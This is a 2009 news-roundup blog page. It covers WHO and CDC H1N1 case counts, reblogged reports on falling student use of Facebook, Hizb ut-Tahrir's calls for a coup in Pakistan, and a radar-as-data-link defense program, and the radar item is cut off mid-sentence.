NOTE: Because of daily reporting deadlines, the state totals reported by CDC may not always be consistent with those reported by state health departments. If there is a discrepancy between these two counts, data from the state health departments should be used as the most accurate number.

---------------------------------

WHO Pandemic (H1N1) 2009 - update 58
6 July 2009 09:00 GMT

The breakdown of the number of laboratory-confirmed cases is given in this map.

Cumulative number of global laboratory-confirmed cases = 94,512 (440 deaths)

Check out the July 7th virtual press briefing with Dr Keiji Fukuda, Assistant Director-General a.i., Health Security and Environment [mp3 16Mb]

WHO has a very cool interactive map as well...which requires Flash. The numbers are a little behind, but it gives a very cool overall picture.

----------------------------------

It is important to remember that the US CDC number includes both lab-confirmed cases and probable cases...the WHO only counts lab-confirmed cases.

Monday, July 6, 2009

Facebook's Own Estimates Show Declining Student Numbers

Via readwriteweb.com -

How fickle are kids these days? Just when all the grown-ups started figuring out Facebook, college and high school users have declined in absolute number by 20% and 15% respectively in a mere six months, according to estimates Facebook provides to advertisers that were archived for tracking by an outside firm. Facebook users aged 55 and over have skyrocketed from under 1 million to nearly six million in the same time period. There are more Facebook users over 55 years old today than there are high school students using the site.

Grandma and Grandpa showed up to have a conversation, but Billy and Sally were gone. Facebook cannot be excited about this.

The dramatic change in user demographics was picked up by iStrategyLabs today. Anyone can go through Facebook's self-serve advertising program and see the user demographics numbers the company estimates now; iStrategyLabs captured that data six months ago and saved it for comparison. The changes have been dramatic.

According to this data, from Facebook's own ad platform, there are actually fewer high school and college users on Facebook today than there were six months ago.

Hizb ut-Tahrir Plotting Against the Pakistan Government

Via Times Online UK -

Followers of the fundamentalist group Hizb ut-Tahrir (HT) have called for a “bloodless military coup” in Islamabad and the creation of the caliphate in which strict Islamic laws would be rigorously enforced.

Members of the group, which describes itself as the Liberation party in Britain but is banned in Pakistan, revealed last week that it had targeted the country as a base from which to spread Islamic rule across the world.

The Sunday Times has obtained the names of a dozen British Hizb ut-Tahrir activists based in Lahore and Karachi, or commuting between Britain and Pakistan. There are believed to be many more.

Tayyib Muqeem, an English teacher from Stoke-on-Trent, said he had moved to Lahore to convert Pakistanis to the movement.

At Lahore’s Superior College, where Muqeem has set up a Hizb ut-Tahrir student group, he said the organisation’s aim was to subject Muslim and western countries to Islamic rule under sharia law, “by force” if necessary.

In a caliphate, “every woman would have to cover up” and stoning to death for adultery and the chopping off of thieves’ hands would be the law, he said.

He added that Islamic rule would be spread through “indoctrination” and by “military means” if non-Muslim countries refused to bow to it. “Waging war” would be part of the caliphate’s foreign policy.

One of Hizb ut-Tahrir’s strategies in Pakistan is to influence military officers, he revealed.

Shahzad Sheikh, a Pakistani recruit and the group’s official spokesman in Karachi, talked openly about persuading the army to instigate a “bloodless coup” against the present government who, he said, were “worse than the Taliban”.

“It is the military who hold the power (in Pakistan) and we are asking them to give their allegiance to Hizb ut-Tahrir,” he said. “I can’t explain to you in detail how we are trying to influence the military . . . We never disclose our methodology of change. You may say it’s a coup.”

-------------------

Hizb ut-Tahrir (Arabic: حِزْبُ التَحْرِير; English: Party of Liberation) is an international pan-Islamist, Sunni, vanguard political party whose goal is to combine all Muslim countries in a unitary Islamic state or caliphate, ruled by Islamic law and with a caliph head of state elected by Muslims.

HT is not designated as a terrorist organization in the United States; however, many consider it to be a stepping stone to more militant organizations.

GlobalSecurity.org - Hizb ut-Tahrir al-Islami

Jamestown - Hizb-ut-Tahrir's Activities in the United States

CT Blog - Hizb ut-Tahrir America (HTA) Enters Public Stage

Official Hizb ut-Tahrir website (English)

Synthetic-aperture Radar Might Perform Double Duty as High-Speed Data Links

Via DefenseSystems.com -

Synthetic aperture radars have used radio frequency technology to give aircraft, ships and ground troops highly detailed tracking data. Now, they might provide a way to share that data in real time. Contractors Raytheon and L-3 Communications have combined efforts in a joint development program that might turn synthetic aperture radar systems into nodes on a high-speed, mobile ad hoc network.

Using the radar’s antennas simultaneously for radar sensing and as a high-speed data link, fighter aircraft would be able to transmit full sensor data — previously only available within the aircraft — to other aircraft and ground stations more than 100 miles away. If successful, the capability that Raytheon and L-3 are developing might transform fighter aircraft and other vehicles equipped with Active Electronically Scanned Array (AESA) radars into powerful intelligence, surveillance and reconnaissance (ISR) platforms, sending synthetic aperture radar images at speeds as fast as 4 gigabits/sec.

“The data that [fighter aircraft have] gathered, which is extremely valuable, has been limited to use in that cockpit because there was no way to offload that amount of data,” said Lucas Bragg, Raytheon’s senior manager of advanced programs. “By now enabling their radar to act as a communications device, you're now able to offload this highly va